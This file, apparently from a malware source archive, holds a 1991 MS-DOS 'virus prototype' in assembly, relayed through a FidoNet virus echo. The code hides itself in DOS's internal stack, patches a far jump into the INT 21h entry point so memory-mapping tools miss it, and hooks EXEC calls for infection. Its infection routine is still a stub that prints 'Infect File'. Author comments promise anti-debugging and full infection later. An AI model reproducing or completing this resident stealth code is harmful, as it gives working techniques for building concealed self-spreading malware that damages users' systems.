MalwareSourceCode/MSDOS/V-Index/Virus.MSDOS.Unknown.vir32.asm

230 lines
7.1 KiB
NASM
Raw Permalink Normal View History

2022-08-21 09:07:57 +00:00
;<3B> PVT.VIRII (2:465/65.4) <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> PVT.VIRII <20>
; Msg : 22 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : STACKVIR.ASM
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
;.RealName: Max Ivanov
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: <20><><EFBFBD><EFBFBD>p<EFBFBD><70><EFBFBD><EFBFBD><EFBFBD> <20> <20><>p<EFBFBD><70><EFBFBD><EFBFBD>)
;* From : Graham Allen, 2:283/718 (06 Nov 94 16:43)
;* To : Edwin Cleton
;* Subj : STACKVIR.ASM
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Graham.Allen@f718.n283.z2.fidonet.org
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
;<3B> <20>
;<3B> V I R U S P R O T O T Y P E <20>
;<3B> <20>
;<3B> Author : Waleri Todorov, CICTT, (C)-Copyright 1991, All Rights Rsrvd <20>
;<3B> Date : 25 Jan 1991 21:05 <20>
;<3B> Function : Found DOS stack in put himself in it. Then trace DOS <20>
;<3B> function EXEC and type 'Infect File' <20>
;<3B> <20>
;<3B> <20>
;<3B> If you want to have fun with this program just run file STACK.COM <20>
;<3B> Don't worry, this is not a virus yet, just try to find him in memory <20>
;<3B> with PCTools and/or MAPMEM. If you can -> just erase the source - it is <20>
;<3B> useless for you. If you can't -> you don't have to look at it - it is too <20>
;<3B> difficult to you to understand it. <20>
;<3B> Best regards, Waleri Todorov <20>
;<3B> <20>
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
mov ah,52h ; Get DOS segmenty
int 21h
cmp ax,1234h ; Also check for already here
jne Install ; If not -> install in memory
ReturnControl
int 20h ; This program will give control
; to main file
Install
mov ax,es ; mov DOS segment in AX
mov DosSeg,ax ; Save DOS segment for further usage
mov ds,ax ; DS now point in DOS segment
call SearchDos ; Search DOS entry point
call SearchStack ; Search DOS stack
push cs ; DS=ES=CS
push cs
pop ds
pop es
mov ax,DosSeg ; get DOS segment in AX
mov cl,4 ; AX*=16
shl ax,cl
mov bx,StackOff ; Stack new begin in BX
and bx,0FFF0h ; Mask low 4 bit
add ax,bx ; Compute new real address
mov cl,4 ; AX/=16
shr ax,cl ; Now we get SEGMENT:0000
sub ax,10h ; Segment-=10-> SEG:100h
mov StackOff,ax ; Save new segment for further usage
mov es,ax ; ES point in DOS New area
mov si,100h ; ES:DI -> DOS:free_space_in_stack
mov di,si ; DS:SI Current segment
mov cx,512d ; Virus is only 512 bytes long
rep movsb ; Move virus to new place
; Installing virus in DOS' stack we will avoid a conflict with PCTools,
; MAPMEM, and other sys software. Remark, that no one DOS buffer wasn't
; affected, so if you have program, that count DOS' buffers to found
; Beast666, she won't found anything.
; In further release of full virus I will include anti-debugger system,
; so you will not be able to trace virus
mov di,DosOff ; ES:DI point to DOS int21 entry point
mov ax,DosSeg
mov es,ax
mov al,0EAh ; JMP XXXX:YYYY
stosb
mov ax,offset Entry21
stosw ; New 21 handler's offset
mov ax,StackOff
stosw ; New 21 handler's segment
; Now DOS will make far jump to virus. In case that virus won't
; get vector 21 directly, MAPMEM-like utilities won't show int 21 catching,
; and DOSEDIT will operate correctly (with several virus he don't).
inc di
inc di
mov Int21off,di ; Virus will call DOS after jump
jmp ReturnControl ; Return control to file
; At this moment, return control is just terminate program via int 20h.
; In further release of full virus this subroutine will be able to
; return control to any file (COM or EXE).
; These are two scanners subroutine. All they do are scanning DOS segment
; for several well-known bytes. Then they update some iternal variables.
; Be patience, when debug this area!
SearchDos
mov ax,cs:[DosSeg]
mov ds,ax
xor si,si
Search1
lodsw
cmp ax,3A2Eh
je NextDos1
dec si
jmp short Search1
NextDos1
lodsb
cmp al,26h
je LastDos
sub si,2
jmp short Search1
LastDos
inc si
inc si
lodsb
cmp al,77h
je FoundDos
sub si,5
jmp short Search1
FoundDos
inc si
mov cs:[Int21off],si
sub si,7
mov cs:[DosOff],si
ret
SearchStack
xor si,si
Search2
lodsw
cmp ax,0CB8Ch
je NextStack1
dec si
jmp short Search2
NextStack1
lodsw
cmp ax,0D38Eh
je NextStack2
sub si,3
jmp short Search2
NextStack2
lodsb
cmp al,0BCh
je FoundStack
sub si,4
jmp short Search2
FoundStack
mov di,si
lodsw
sub ax,200h
stosw
mov cs:[StackOff],ax
ret
Entry21 ; Here is new int 21 handler
cmp ah,52h ; If GET_LIST_OF_LISTS
jne NextCheck
mov ax,1234h ; then probably I am here
mov bx,cs:[DosSeg] ; so return special bytes in AX
mov es,bx
mov bx,26h
iret ; Terminate AH=52h->return to caller
NextCheck
cmp ax,4B00h ; If EXEC file
jne GoDos
call Infect ; then file will be infected
GoDos
jmp dword ptr cs:[Int21off]
; Otherwise jump to DOS
Infect
push ds ; At this moment just write on screen
push dx
push ax
push cs
pop ds
mov dx,offset Txt
mov ah,9
CallDos
pushf ; Call real DOS
call dword ptr cs:[Int21off]
pop ax
pop dx
pop ds
ret
Int21off dw 0 ; Offset of DOS 21 AFTER jump to virus
DosSeg dw 0 ; DOS segment
StackOff dw 0 ; Offset of stack/New segment
DosOff dw 0 ; Offset of DOS 21 BEFIRE jump
Txt db 'Infect File$' ; Dummy text
;-+- FMail 0.96<EFBFBD>
; + Origin: FidoNet * Mathieu Not<6F>ris * Brussels-Belgium-Europe (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; <20> The Me<4D>eO
;
;/Twx Windows image
;
;--- Aidstest Null: /Kill
; * Origin: <20>PVT.ViRII<49>main<69>board<72> / Virus Research labs. (2:5030/136)